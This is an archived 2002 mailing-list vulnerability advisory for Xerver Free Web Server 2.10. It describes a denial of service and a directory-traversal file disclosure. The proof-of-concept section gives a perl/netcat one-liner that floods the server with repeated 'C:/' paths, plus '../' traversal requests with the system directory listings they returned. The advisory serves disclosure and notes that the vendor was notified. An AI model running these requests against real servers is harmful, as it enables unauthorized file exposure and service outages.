OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Alex Hernandez (al3xhernandezureach.com)
Date: Fri Mar 08 2002 - 17:39:39 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ------oOo------
    Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of
    Service
    Attack).
    ------oOo------

    Company Affected: www.JavaScript.nu
    Version: v2.10
    Date Added: 02-27-02
    Size: 287 KB
    OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL,
    MAC ALL.

    Author:

    ** Alex Hernandez <al3xhernandezureach.com>
    ** Thanks all the people from Spain and Argentina.
    ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

    Also a greet to "KF" <dotslashsnosoft.com>
    http://www.snosoft.com for invitme to participate for more
    research about the Bugs, Exploits and Vulnerabilities :-)
    thanks friend, u have publish exelents bugs :X

    ----=[Brief Description]=------------

    Xerver Free Web Server is a tiny web server allowing you to run
    CGI/perl
    scripts on
    your computer. Xerver includes features such as: Allow/forbid
    directory
    listing,
    create your own error pages ("404 File Not Found"), allow/deny
    CGI-scripts, choose
    your own index file extensions, share/unshare hidden files or
    files with
    certain
    file extensions, share unlimited folders etc. Xerver is a tiny,
    fast and
    free web
    server, but is still advanced and supports both HTTP/1.1 and
    HTTP/1.0
    and all HTTP
    methods (GET, POST and HEAD)."Run CGI/perl scripts on your
    computer.

    ----=[Summary]=----------------------

    Exist two vulnerabilities:

    The port 32123 usually is configuration of the server , exist a
    one
    metod for crass this
    system calling the drive C:\ several times, another bug exists
    on server
    remote any
    user can see all the files configuration on the system also
    even though
    one has formed
    the services to deny the folders or files any user can access
    via remote
    to 80 port
    finding the configuration of the own server.

    ------oOo------
    Proof of concept

    DoS

    http://localhost:32123

    $ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn
    127.0.0.1 32123

    Explotation:

    Example 1:

    $ nc -vvn 127.0.0.1 80
    (UNKNOWN) [127.0.0.1] 80 (?) open
    GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
    HTTP/1.1 200 OK
    Date: March 6, 2002 8:52:51 PM CST
    Server: Xerver_v2
    Connection: close
    Location: /
    Content-Type: text/html

    <HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
    BGCOLOR=white COL
    OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory
    Listing for
    /</H2></F
    ONT><PRE> <B>File name File
    size&nb
    sp; Last modified</B>

    Program Files
    ----------------------------------------------------------------
    ----------------
    <A HREF="Program Files" STYLE="text-decoration: none;"><IMG
    SRC="/Image:showFold
    er" BORDER=0> Program Files</A>
    ----------------------------------------------------------------
    ----------------

    RECYCLER
    ----------------------------------------------------------------
    ----------------
    <A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
    SRC="/Image:showFolder" B
    ORDER=0> RECYCLER</A>
    ----------------------------------------------------------------
    ----------------

    WINNT
    ----------------------------------------------------------------
    ----------------
    <A HREF="WINNT" STYLE="text-decoration: none;"><IMG
    SRC="/Image:showFolder" BORD
    ER=0> WINNT</A>
    ----------------------------------------------------------------
    ---------------

    [...]

    or via web:

    http://localhost/unix/ALEX/Xerver2.10/../../../

    Directory Listing for /

        File name File size Last modified

     $unix
     ALEX
     Documents and Settings
     My Downloads
     Program Files
     RECYCLER

    [...]

    Example 2:

    $ nc -vvn 127.0.0.1 80
    (UNKNOWN) [127.0.0.1] 80 (?) open
    GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

    The results is:

    Directory Listing for /WINNT/system32/

    File name File size Last
    modified
     ../
     AdCache
     CatRoot
     Com
     DTCLog
     DirectX
     GroupPolicy
     Hummbird
     IOSUBSYS
     Macromed
     Microsoft

    [...]

    ------oOo------------------------------------
    Vendor Response:
    The vendor was notified
    "Omid Rouhani" webmasterjavascript.nu
    htttp://www.JavaScript.nu
    Patch Temporary: Restricted files and Directories

    Alex Hernandez <al3xhernandezureach.com> (c) 2002.

    ------oOo------------------------------------

    ________________________________________________
    Get your own "800" number
    Voicemail, fax, email, and a lot more
    http://www.ureach.com/reg/tag